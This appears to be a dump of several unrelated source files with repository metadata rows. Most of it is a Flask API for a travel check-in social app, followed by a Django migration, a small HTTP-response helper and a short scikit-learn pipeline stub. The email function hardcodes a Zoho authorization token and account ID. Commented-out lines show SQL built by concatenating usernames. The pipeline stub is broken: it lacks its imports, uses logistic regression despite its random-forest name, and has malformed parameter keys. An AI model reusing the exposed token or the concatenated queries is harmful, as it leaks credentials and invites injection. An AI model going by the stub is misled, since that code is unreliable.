return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# User Login
@app.route("/api/user/login", methods=["POST"])
def login():
# Read in login input parameters
username = request.form.get('username') # String (a-z, A-Z, 0-9, -, _)
password = request.form.get('password') # String (6 <= characters <= 256)
# Check if all the login input parameters are valid
check = check_for_none("login", [("username", username), ("password", password)])
if check is not None:
return jsonify(check), status.HTTP_200_OK
check2 = validate_parameters("login", username=username, password=password)
if check2 is not None:
return jsonify(check2), status.HTTP_200_OK
try:
cursor = db.cursor()
except:
error_code = "connection_to_database_failed"
content = {"success": False, "error_code": error_code}
print(traceback.format_exc())
return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
# If this line of the login() function is reached,
# all the login input parameters are valid.
# Search user table for password hash to check if the password is correct
cursor.execute("SELECT email_address, display_name, password_hash FROM user WHERE username=%s;", (username,))
result = cursor.fetchone()
# Return a bad login credential error if the username isn't in the table
if not result:
error_code = "user_login_bad_credentials"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
# Check if the input password matches the password hash in the user table and therefore, correct
is_correct_password = bcrypt.check_password_hash(str(result[2]), password)
# Return a bad login credential error if the password isn't correct
if not is_correct_password:
error_code = "user_login_bad_credentials"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
email = result[0]
display_name = result[1]
cursor.execute("SELECT email_token FROM user WHERE username=%s;", (username, ))
result = cursor.fetchone()
email_token = result[0]
if email_token is not None:
error_code = "user_email_not_verified"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
# Generate an access token and insert it into the user table
access_token = binascii.hexlify(os.urandom(32)).decode()
cursor.execute("UPDATE user SET access_token=%s WHERE username=%s;", (access_token, username))
db.commit()
cursor.close()
content = {"success": True, "email_address": email, "display_name": display_name, "access_token": access_token}
return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# User Logout
@app.route("/api/user/logout", methods=["POST"])
def logout():
# Read in logout input parameters
username = request.form.get('username') # String (a-z, A-Z, 0-9, -, _)
access_token = request.form.get('access_token')
# Check if all the logout input parameters are valid
check = check_for_none("logout", [("username", username)])
if check is not None:
return jsonify(check), status.HTTP_200_OK
check2 = validate_parameters("logout", username=username)
if check2 is not None:
return jsonify(check2), status.HTTP_200_OK
try:
cursor = db.cursor()
except:
error_code = "connection_to_database_failed"
content = {"success": False, "error_code": error_code}
print(traceback.format_exc())
return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
# Check if the access token is valid
cursor.execute("SELECT access_token FROM user WHERE username=%s;", (username,))
result = cursor.fetchone()
# Return a bad username error if the username isn't in the table
if not result:
error_code = "user_logout_bad_username"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
elif not (access_token == result[0]):
error_code = "user_bad_access_token"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
# If this line of the logout() function is reached,
# all the logout input parameters are valid.
else:
cursor.execute("UPDATE user SET access_token=NULL WHERE username=%s;", (username,))
db.commit()
cursor.close()
content = {"success": True}
return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# Search User
@app.route("/api/user/search", methods=["POST"])
def search():
# Read in search input parameters
username = request.form.get('username') # String (a-z, A-Z, 0-9, -, _)
search_username = request.form.get('search_username') # String (a-z, A-Z, 0-9, -, _)
access_token = request.form.get('access_token')
# Check if all the search input parameters are valid
check = check_for_none("search", [("username", username), ("search_username", search_username)])
if check is not None:
return jsonify(check), status.HTTP_200_OK
check2 = validate_parameters("search", username=username, username2=search_username)
if check2 is not None:
return jsonify(check2), status.HTTP_200_OK
try:
cursor = db.cursor()
except:
error_code = "connection_to_database_failed"
content = {"success": False, "error_code": error_code}
print(traceback.format_exc())
return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
# Check if the access token is valid
cursor.execute("SELECT access_token FROM user WHERE username=%s;", (username,))
result = cursor.fetchone()
# Return a bad username error if the username isn't in the table
if not result:
error_code = "user_search_bad_username"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
elif not (access_token == result[0]):
error_code = "user_bad_access_token"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
# Find all usernames similar to the provided username
cursor.execute("SELECT username, display_name FROM user WHERE username LIKE %s;", (search_username + "%",))
results = cursor.fetchall()
cursor.close()
if not results:
error_code = "user_search_no_results_found"
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
users = [{"username": result[0], "display_name": result[1]} for result in results]
content = {"success": True, "results": users}
return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# User Profile
@app.route("/api/user/profile/<username>", methods=["POST"])
def profile(username):
# Read in profile input parameters
logged_in_username = request.form.get('username') # String (a-z, A-Z, 0-9, -, _)
access_token = request.form.get('access_token')
# Check if all the profile input parameters are valid
check = check_for_none("profile", [("username", logged_in_username)])
if check is not None:
return jsonify(check), status.HTTP_200_OK
check2 = validate_parameters("profile", username=logged_in_username)
if check2 is not None:
return jsonify(check2), status.HTTP_200_OK
try:
cursor = db.cursor()
except:
error_code = "connection_to_database_failed"
content = {"success": False, "error_code": error_code}
print(traceback.format_exc())
return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
# Check if the access token is valid
cursor.execute("SELECT access_token FROM user WHERE username=%s;", (logged_in_username,))
result = cursor.fetchone()
# Return a bad username error if the username isn't in the table
if not result:
error_code = "user_profile_bad_username"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
elif not (access_token == result[0]):
error_code = "user_bad_access_token"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
# If this line of the profile() function is reached,
# all the profile input parameters are valid.
# cursor.execute("SELECT email_address, display_name, join_date, checkin_count FROM user WHERE username=%s;",
# (username,)) # query the database for that user
# user_info = cursor.fetchone()
#
# # we need to get email_address, display_name, join_datetime, checkin_count, and recent_checkins
# email_address = user_info[0]
# display_name = user_info[1]
# join_date = user_info[2]
# checkin_count = user_info[3]
#
# # The result of this call should be returned as "following_count":
# cursor.execute("SELECT COUNT(*) FROM follow WHERE username_follower=%s", (username,))
# following_count = cursor.fetchone()
#
# # The result of this call should be returned as "follower_count":
# cursor.execute("SELECT COUNT(*) FROM follow WHERE username_followee=%s", (username,))
# follower_count = cursor.fetchone()
cursor.execute("SELECT * FROM profile WHERE username=%s;", (username,)) # query the database for that user
user_info = cursor.fetchone()
# we need to get email_address, display_name, join_datetime, checkin_count, and recent_checkins
email_address = user_info[1]
display_name = user_info[2]
join_date = user_info[3]
checkin_count = user_info[4]
score = user_info[5]
following_count = user_info[6]
follower_count = user_info[7]
cursor.execute("SELECT id,title,description,points FROM achievement WHERE id IN (SELECT achievement_id FROM achieve WHERE username =%s)", (username,))
results = cursor.fetchall()
achievements = [{"id": result[0], "title": result[1], "description": result[2], "points": result[3]} for result in results]
cursor.execute("SELECT city.name, checkin_time, latitude, longitude, accent_name, country.name " +
"FROM city, checkin, country " +
"WHERE id = city_id AND city.country = country.code AND username=%s " +
"ORDER BY checkin_time DESC " +
"LIMIT 0,15;", (username,))
results = cursor.fetchall()
cursor.close()
recent_checkins = [{"city_name": result[0], "checkin_time": result[1], "latitude": float(result[2]), "longitude": float(result[3]), "accent_name": result[4], "country_name": result[5]} for result in results]
content = {"success": True, "email_address": email_address, "display_name": display_name, "join_date": join_date,
"checkin_count": checkin_count, "recent_checkins": recent_checkins, "score": score,
"following_count": following_count, "follower_count": follower_count, "achievements": achievements}
return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# Change Password
@app.route("/api/user/changePassword", methods=["POST"])
def change_password():
# Read in password change input parameters
username = request.form.get('username') # String (a-z, A-Z, 0-9, -, _)
old_password = request.form.get('old_password') # String (6 <= characters <= 256)
new_password = request.form.get('new_password') # String (6 <= characters <= 256)
access_token = request.form.get('access_token')
# Check if all the changePassword input parameters are valid
check = check_for_none("changePassword",
[("username", username), ("old_password", old_password), ("new_password", new_password)])
if check is not None:
return jsonify(check), status.HTTP_200_OK
check2 = validate_parameters("changePassword", username=username, password=old_password, password2=new_password)
if check2 is not None:
return jsonify(check2), status.HTTP_200_OK
try:
cursor = db.cursor()
except:
error_code = "connection_to_database_failed"
content = {"success": False, "error_code": error_code}
print(traceback.format_exc())
return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
# Check if the old password and access token are valid
# cursor.execute("SELECT password_hash, access_token FROM user WHERE username='" + username + "';")
cursor.execute("SELECT password_hash, access_token FROM user WHERE username=%s;", (username,))
result = cursor.fetchone()
# Return a bad username error if the username isn't in the table
if not result:
error_code = "user_changePassword_bad_username"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
# Check if the old password matches the password hash in the user table and therefore, correct
is_correct_password = bcrypt.check_password_hash(str(result[0]), old_password)
# Return a bad old_password error if the old password isn't correct
if not is_correct_password:
error_code = "user_changePassword_bad_old_password"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
elif not (access_token == result[1]):
error_code = "user_bad_access_token"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
# If this line of the changePassword() function is reached,
# all the password change input parameters are valid.
else:
password_hash = bcrypt.generate_password_hash(new_password)
cursor.execute("UPDATE user SET password_hash=%s WHERE username=%s;", (password_hash, username))
db.commit()
cursor.close()
content = {"success": True}
return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# Change Display Name
@app.route("/api/user/changeDisplayName", methods=["POST"])
def change_display_name():
# Read in display name change input parameters
username = request.form.get('username') # String (a-z, A-Z, 0-9, -, _)
display_name = request.form.get('display_name') # String (6 <= characters <= 256)
access_token = request.form.get('access_token')
# Check if all the changeDisplayName input parameters are valid
check = check_for_none("changeDisplayName", [("username", username), ("display_name", display_name)])
if check is not None:
return jsonify(check), status.HTTP_200_OK
check2 = validate_parameters("changeDisplayName", username=username, display_name=display_name)
if check2 is not None:
return jsonify(check2), status.HTTP_200_OK
try:
cursor = db.cursor()
except:
error_code = "connection_to_database_failed"
content = {"success": False, "error_code": error_code}
print(traceback.format_exc())
return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
# Check if the access token is valid
# cursor.execute("SELECT access_token FROM user WHERE username='" + username + "';")
cursor.execute("SELECT access_token FROM user WHERE username=%s;", (username,))
result = cursor.fetchone()
# Return a bad username error if the username isn't in the table
if not result:
error_code = "user_changeDisplayName_bad_username"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
elif not (access_token == result[0]):
error_code = "user_bad_access_token"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
# If this line of the changeDisplayName() function is reached,
# all the display name change input parameters are valid.
else:
cursor.execute("UPDATE user SET display_name=%s WHERE username=%s;", (display_name, username))
db.commit()
cursor.close()
content = {"success": True}
return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# Change Email Address
@app.route("/api/user/changeEmailAddress", methods=["POST"])
def change_email_address():
# Read in email address change input parameters
username = request.form.get('username') # String (a-z, A-Z, 0-9, -, _)
email_address = request.form.get('email_address') # String (6 <= characters <= 256)
access_token = request.form.get('access_token')
# Check if all the changeEmailAddress input parameters are valid
check = check_for_none("changeEmailAddress", [("username", username), ("email_address", email_address)])
if check is not None:
return jsonify(check), status.HTTP_200_OK
check2 = validate_parameters("changeEmailAddress", username=username, email_address=email_address)
if check2 is not None:
return jsonify(check2), status.HTTP_200_OK
try:
cursor = db.cursor()
except:
error_code = "connection_to_database_failed"
content = {"success": False, "error_code": error_code}
print(traceback.format_exc())
return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
# Check if the access token is valid
# cursor.execute("SELECT access_token FROM user WHERE username='" + username + "';")
cursor.execute("SELECT access_token FROM user WHERE username=%s;", (username,))
result = cursor.fetchone()
# Return a bad username error if the username isn't in the table
if not result:
error_code = "user_changeEmailAddress_bad_username"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
elif not (access_token == result[0]):
error_code = "user_bad_access_token"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
# If this line of the changeEmailAddress() function is reached,
# all the email address change input parameters are valid.
else:
cursor.execute("UPDATE user SET email_address=%s WHERE username=%s;", (email_address, username))
db.commit()
cursor.close()
content = {"success": True}
return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# City Checkin
@app.route("/api/user/checkin", methods=["POST"])
def checkin():
# Read in checkin input parameters
username = request.form.get('username') # String (a-z, A-Z, 0-9, -, _)
access_token = request.form.get('access_token') # String (6 <= characters <= 256)
latitude = request.form.get('latitude') # Float (-90 <= latitude <= 90)
longitude = request.form.get('longitude') # Float (-180 <= longitude <= 180)
# Check if all the checkin input parameters are valid
check = check_for_none("checkin", [("username", username), ("latlong", latitude), ("latlong", longitude)])
if check is not None:
return jsonify(check), status.HTTP_200_OK
check2 = validate_parameters("checkin", username=username, latitude=latitude, longitude=longitude)
if check2 is not None:
return jsonify(check2), status.HTTP_200_OK
try:
cursor = db.cursor()
except:
error_code = "connection_to_database_failed"
content = {"success": False, "error_code": error_code}
print(traceback.format_exc())
return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
# Check if the access token is valid
# cursor.execute("SELECT access_token FROM user WHERE username='" + username + "';")
cursor.execute("SELECT access_token FROM user WHERE username=%s;", (username,))
result = cursor.fetchone()
# Return a bad username error if the username isn't in the table
if not result:
error_code = "user_checkin_bad_username"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
elif not (access_token == result[0]):
error_code = "user_bad_access_token"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
# Distance is in miles
# Paris latitude: 48.856062
# Paris longitude: 2.347510
# Suggestions for improving performance:
# 1. Use a square then a circle to query for cities
# 2. Parallel query execution- Run the two queries in Parallel
# 3. Run the query once in SQL and sort it twice in Python
LAT_BUFFER = 0.1
DISTANCE_THRESHOLD = 5
cursor.execute("(" +
"SELECT * " +
"FROM " +
"(" +
"SELECT *, gcdist(%s, %s, latitude, longitude) AS distance_mi " +
"FROM city " +
"WHERE latitude " +
"BETWEEN (%s - %s) AND (%s + %s) " +
"HAVING distance_mi < %s " +
"ORDER BY distance_mi" +
") AS city_tmp " +
"WHERE population > 0 " +
"ORDER BY distance_mi " +
"LIMIT 0,1" +
")" +
"UNION" +
"(" +
"SELECT * " +
"FROM " +
"(" +
"SELECT *, gcdist(%s, %s, latitude, longitude) AS distance_mi " +
"FROM city " +
"WHERE latitude BETWEEN (%s - %s) AND (%s + %s) " +
"HAVING distance_mi < %s " +
"ORDER BY distance_mi" +
") AS city_tmp " +
"ORDER BY distance_mi " +
"LIMIT 0,1" +
");", (
latitude, longitude, latitude, LAT_BUFFER, latitude, LAT_BUFFER, DISTANCE_THRESHOLD,
latitude, longitude, latitude, LAT_BUFFER, latitude, LAT_BUFFER, DISTANCE_THRESHOLD))
results = cursor.fetchall()
if not results:
error_code = "user_checkin_not_close_enough_to_city"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
# If the closest city has no population and the most populated city
# within 5 miles doesn't, return the most populated city. Otherwise,
# return the closest city.
final_result = results[0]
country_code = final_result[1]
cursor.execute("SELECT name FROM country WHERE code=%s;",(country_code,))
country_name = cursor.fetchone()
cursor.execute("INSERT INTO checkin values(%s, %s, NOW());", (username, str(final_result[0])))
db.commit()
cursor.close()
content = {"success": True, "city_name": final_result[2], "region_name": "NA", "region_code": final_result[3],
"country_name": country_name[0], "country_code": final_result[1], "accent_name": final_result[7]}
return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# Follow User
@app.route("/api/user/follow", methods=["POST"])
def follow():
username_from = request.form.get('username_from') # String (a-z, A-Z, 0-9, -, _)
username_to = request.form.get('username_to') # String (a-z, A-Z, 0-9, -, _)
access_token = request.form.get('access_token')
# Check if all the follow input parameters are valid
check = check_for_none("follow",
[("username_from", username_from), ("username_to", username_to)])
if check is not None:
return jsonify(check), status.HTTP_200_OK
check2 = validate_parameters("follow", username=username_from, username2=username_to)
if check2 is not None:
return jsonify(check2), status.HTTP_200_OK
try:
cursor = db.cursor()
except:
error_code = "connection_to_database_failed"
content = {"success": False, "error_code": error_code}
print(traceback.format_exc())
return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
# Check if the access token is valid
# cursor.execute("SELECT access_token FROM user WHERE username='" + username_from + "';")
cursor.execute("SELECT access_token FROM user WHERE username=%s;", (username_from,))
result = cursor.fetchone()
# Return a bad username error if the username isn't in the table
if not result:
error_code = "user_follow_bad_username_from"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
elif not (access_token == result[0]):
error_code = "user_bad_access_token"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
cursor.execute("SELECT * FROM user WHERE username=%s;", (username_to,))
result = cursor.fetchone()
# return a bad username error if the username isn't in the table
if not result:
error_code = "user_follow_bad_username_to"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
# finished argument checking here
# add the follow to the table
cursor.execute("INSERT INTO follow VALUES (%s, %s);", (username_from, username_to))
db.commit()
cursor.close()
content = {"success": True}
return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# Unfollow User
@app.route("/api/user/unfollow", methods=["POST"])
def unfollow():
username_from = request.form.get('username_from') # String (a-z, A-Z, 0-9, -, _)
username_to = request.form.get('username_to') # String (a-z, A-Z, 0-9, -, _)
access_token = request.form.get('access_token')
# Check if all the unfollow input parameters are valid
check = check_for_none("unfollow",
[("username_from", username_from), ("username_to", username_to)])
if check is not None:
return jsonify(check), status.HTTP_200_OK
check2 = validate_parameters("unfollow", username=username_from, username2=username_to)
if check2 is not None:
return jsonify(check2), status.HTTP_200_OK
try:
cursor = db.cursor()
except:
error_code = "connection_to_database_failed"
content = {"success": False, "error_code": error_code}
print(traceback.format_exc())
return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
# Check if the access token is valid
# cursor.execute("SELECT access_token FROM user WHERE username='" + username_from + "';")
cursor.execute("SELECT access_token FROM user WHERE username=%s;", (username_from,))
result = cursor.fetchone()
# Return a bad username error if the username isn't in the table
if not result:
error_code = "user_unfollow_bad_username_from"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
elif not (access_token == result[0]):
error_code = "user_bad_access_token"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
cursor.execute("SELECT * FROM user WHERE username=%s;", (username_to,))
result = cursor.fetchone()
# return a bad username error if the username isn't in the table
if not result:
error_code = "user_unfollow_bad_username_to"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
# finished argument checking here
# remove the follow to the table
cursor.execute("DELETE FROM follow WHERE username_from=%s AND username_to=%s;",
(username_from, username_to))
db.commit()
cursor.close()
content = {"success": True}
return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# Delete User
@app.route("/api/user/remove", methods=["POST"])
def remove():
# Read in profile input parameters
username = request.form.get('username') # String (a-z, A-Z, 0-9, -, _)
access_token = request.form.get('access_token')
# Check if all the remove input parameters are valid
check = check_for_none("remove", [("username", username)])
if check is not None:
return jsonify(check), status.HTTP_200_OK
check2 = validate_parameters("remove", username=username)
if check2 is not None:
return jsonify(check2), status.HTTP_200_OK
try:
cursor = db.cursor()
except:
error_code = "connection_to_database_failed"
content = {"success": False, "error_code": error_code}
print(traceback.format_exc())
return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
# Check if the access token is valid
cursor.execute("SELECT access_token FROM user WHERE username=%s;", (username,))
result = cursor.fetchone()
# Return a bad username error if the username isn't in the table
if not result:
error_code = "user_remove_bad_username"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
elif not (access_token == result[0]):
error_code = "user_bad_access_token"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
# arguments are valid
# remove user from user table
cursor.execute("DELETE FROM user WHERE username=%s;", (username,))
db.commit()
cursor.close()
content = {"success": True}
return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# Verify Email
@app.route("/verify", methods=["GET"])
def email_verify():
email_token = request.args.get('email_token')
if email_token is None:
error_code = "invalid_email_token"
content ={"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
try:
cursor = db.cursor()
except:
error_code = "connection_to_database_failed"
content = {"success": False, "error_code": error_code}
print(traceback.format_exc())
return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
cursor.execute("SELECT username FROM user WHERE email_token=%s;", (email_token,))
result = cursor.fetchone()
if not result:
error_code = "bad_email_token"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
cursor.execute("UPDATE user SET email_token = NULL WHERE email_token=%s;",(email_token,))
db.commit()
cursor.close()
content = {"success": True}
return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
#email verification request
def send_email_verif(email_address, email_token):
headers = {'Authorization': 'Zoho-authtoken a61e6765b5f28645c9621a7057f29973'}
payload = {
"fromAddress" : "travelations@shreyas208.com",
"toAddress": email_address,
"subject": "Travelations Account Verification",
"encoding": "UTF-8",
"mailFormat": "html",
"content": "Welcome to Travelation!<br />Please verify your account <a href=\"http://fa17-cs411-18.cs.illinois.edu/verify?email_token=" + email_token + "\">here</a>."
}
r = requests.post('https://mail.zoho.com/api/accounts/5601770000000008001/messages', json=payload, headers=headers)
# -------------------------------------------------------------------------------------------------------------------- #
# News Feed
@app.route("/api/user/feed", methods=["POST"])
def feed():
# Read in feed input parameters
username = request.form.get('username') # String (a-z, A-Z, 0-9, -, _)
access_token = request.form.get('access_token')
# Check if all the feed input parameters are valid
check = check_for_none("feed", [("username", username)])
if check is not None:
return jsonify(check), status.HTTP_200_OK
check2 = validate_parameters("feed", username=username)
if check2 is not None:
return jsonify(check2), status.HTTP_200_OK
try:
cursor = db.cursor()
except:
error_code = "connection_to_database_failed"
content = {"success": False, "error_code": error_code}
print(traceback.format_exc())
return jsonify(content), status.HTTP_500_INTERNAL_SERVER_ERROR
# Check if the access token is valid
cursor.execute("SELECT access_token FROM user WHERE username=%s;", (username,))
result = cursor.fetchone()
# Return a bad username error if the username isn't in the table
if not result:
error_code = "user_feed_bad_username"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
elif not (access_token == result[0]):
error_code = "user_bad_access_token"
cursor.close()
content = {"success": False, "error_code": error_code}
return jsonify(content), status.HTTP_200_OK
# arguments are valid
#
cursor.execute("SELECT username, accent_name, country.name AS country_name, checkin_time " +
"FROM checkin, city, country " +
"WHERE username IN " +
"(" +
"SELECT username_to " +
"FROM follow " +
"WHERE username_from = %s" +
") AND " +
"checkin.city_id = city.id AND city.country = country.code "
"ORDER BY checkin_time DESC " +
"LIMIT 0, 25;", (username,))
results = cursor.fetchall()
cursor.close()
checkins = [{"username": result[0], "accent_name": result[1], "country_name": result[2], "checkin_time": result[3]} for result in results]
content = {"success": True, "checkins": checkins}
return jsonify(content), status.HTTP_200_OK
# -------------------------------------------------------------------------------------------------------------------- #
# Root
@app.route("/")
def root():
return "You have reached our Flask server."
# -------------------------------------------------------------------------------------------------------------------- #
# Check if any of the parameters are None
def check_for_none(function_name, params):
for param in params:
if param[1] is None:
error_code = "user_" + function_name + "_empty_field"
content = {"success": False, "error_code": error_code}
return content
return None
# -------------------------------------------------------------------------------------------------------------------- #
# Validates parameters for different functions
def validate_parameters(function_name, username=None, username2=None, password=None, password2=None,
email_address=None, display_name=None, latitude=None, longitude=None):
# Check if username is valid
if username is not None:
if not all((c in ascii_letters + digits + '-' + '_') for c in username):
#if function_name == "follow" or function_name == "unfollow":
#error_code = "user_" + function_name + "_invalid_username_from"
#else:
#error_code = "user_" + function_name + "_invalid_username"
error_code = "user_" + function_name + "_bad_credentials"
content = {"success": False, "error_code": error_code}
return content
# Check if username is valid
if username2 is not None:
if not all((c in ascii_letters + digits + '-' + '_') for c in username2):
#if function_name == "follow" or function_name == "unfollow":
# error_code = "user_" + function_name + "_invalid_username_to"
#elif function_name == "search":
# error_code = "user_" + function_name + "_invalid_search_username"
#else:
# error_code = "user_" + function_name + "_invalid_username"
error_code = "user_" + function_name + "_bad_credentials"
content = {"success": False, "error_code": error_code}
return content
# Check if password is valid
if password is not None:
if (not all((c in ascii_letters + digits + punctuation) for c in password)) \
or (not (6 <= len(password) <= 256)):
#if function_name == "changePassword":
# error_code = "user_" + function_name + "_invalid_old_password"
#else:
# error_code = "user_" + function_name + "_invalid_password"
error_code = "user_" + function_name + "_bad_credentials"
content = {"success": False, "error_code": error_code}
return content
# Check if password2 is valid
if password2 is not None:
if (not all((c in ascii_letters + digits + punctuation) for c in password2)) \
or (not (6 <= len(password2) <= 256)):
#if function_name == "changePassword":
# error_code = "user_" + function_name + "_invalid_new_password"
#else:
# error_code = "user_" + function_name + "_invalid_password"
error_code = "user_" + function_name + "_bad_credentials"
content = {"success": False, "error_code": error_code}
return content
# Check if email_address is valid
if email_address is not None:
email_regex = re.compile(r"[^@]+@[^@]+\.[^@]+")
if not email_regex.match(email_address):
error_code = "user_" + function_name + "_invalid_email"
content = {"success": False, "error_code": error_code}
return content
# Check if display_name is valid
if display_name is not None:
if (not all((c in ascii_letters + digits + '-' + '_' + ' ') for c in display_name)) \
or (not (1 <= len(display_name) <= 256)):
error_code = "user_" + function_name + "_invalid_display_name"
content = {"success": False, "error_code": error_code}
return content
# Check if latitude is valid
if latitude is not None:
if not (-90 <= float(latitude) <= 90):
error_code = "user_" + function_name + "_invalid_latlong"
content = {"success": False, "error_code": error_code}
return content
# Check if longitude is valid
if longitude is not None:
if not (-180 <= float(longitude) <= 180):
error_code = "user_" + function_name + "_invalid_latlong"
content = {"success": False, "error_code": error_code}
return content
return None
# -------------------------------------------------------------------------------------------------------------------- #
# Runs the app
if __name__ == "__main__":
app.run()
| [
"gautham.bommannan@gmail.com"
] | gautham.bommannan@gmail.com |
020475e06a3527c5a07704bb84ea5c04a8b97fcf | 3f8aca7a66b717872ff6f4d811417c3861f514c2 | /django/airline/flights/migrations/0001_initial.py | 9cc5d610781220b9d7b6828ed790fa57f3b95898 | [] | no_license | anasahmed700/python-web-programming | 297f47cba76715df0fc576bcc6254eb926fdc40d | 505233cb76e33e00e7838bbab62740ac5c4ea01c | refs/heads/master | 2022-09-05T21:45:49.885195 | 2020-06-04T12:44:50 | 2020-06-04T12:44:50 | 269,036,613 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 606 | py | # Generated by Django 3.0.6 on 2020-06-02 08:05
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Flight',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('origin', models.CharField(max_length=64)),
('destination', models.CharField(max_length=64)),
('duration', models.IntegerField()),
],
),
]
| [
"anasahmed700@gmail.com"
] | anasahmed700@gmail.com |
6e69b5b44498b70dbb7ec604c2bc824d7cd54d73 | 31e10d5f9bbdf768a2b6aae68af0c2105b43120c | /web+多线程/miniweb框架/web服务器/application/utils.py | fc5a398094a52747dd43aa00a08d209b8d724c5b | [] | no_license | 664120817/python-test | 6d0ce82923b3e7974f393fc8590c5e47e4117781 | 418085378ca0db8019e4fa3b5564daebed0e6163 | refs/heads/master | 2023-02-16T13:10:55.403774 | 2022-08-02T17:01:52 | 2022-08-02T17:01:52 | 200,843,808 | 8 | 11 | null | 2023-02-15T16:53:44 | 2019-08-06T12:08:19 | Python | UTF-8 | Python | false | false | 435 | py | def create_http_response(status,response_body):
# 拼接响应
request_line = "HTTP/1.1 {}\r\n".format(status) # 请求行
request_header = "Server:python80WS/2.1;charset=UTF-8 \r\n" # 请求头
request_header += "Content-Type:text/html\r\n"
request_blank = "\r\n" # 请求空行
request_data = (request_line + request_header + request_blank).encode() + response_body # 整体拼接
return request_data | [
"51182039+664120817@users.noreply.github.com"
] | 51182039+664120817@users.noreply.github.com |
5e739a9617a64bc798515aecdab7050c7538a08e | 9141400a88839683c5bc87a6174883ef59131db8 | /Classification/random_forest_pipeline.py | 2a8c511698f734f3489b837edc97a4f363cbf3c8 | [] | no_license | Arunkalyan/MLModel | 1fed51d5638c83c4e463d141f3cd88e64de7ab33 | de24420c9100dab3a5689261eb89080173664836 | refs/heads/master | 2021-01-11T21:13:14.316169 | 2017-02-15T04:41:06 | 2017-02-15T04:41:06 | 79,271,500 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 308 | py | #!/usr/bin/python
from math import sqrt
def randomForest_pipeline(total_features):
pipe = Pipeline(steps=[
('clf', LogisticRegression())
])
parameters = {'n_jobs': [-1],
'max_features': [sqrt(total_features)]
}
return pipe, parameters
| [
"noreply@github.com"
] | noreply@github.com |
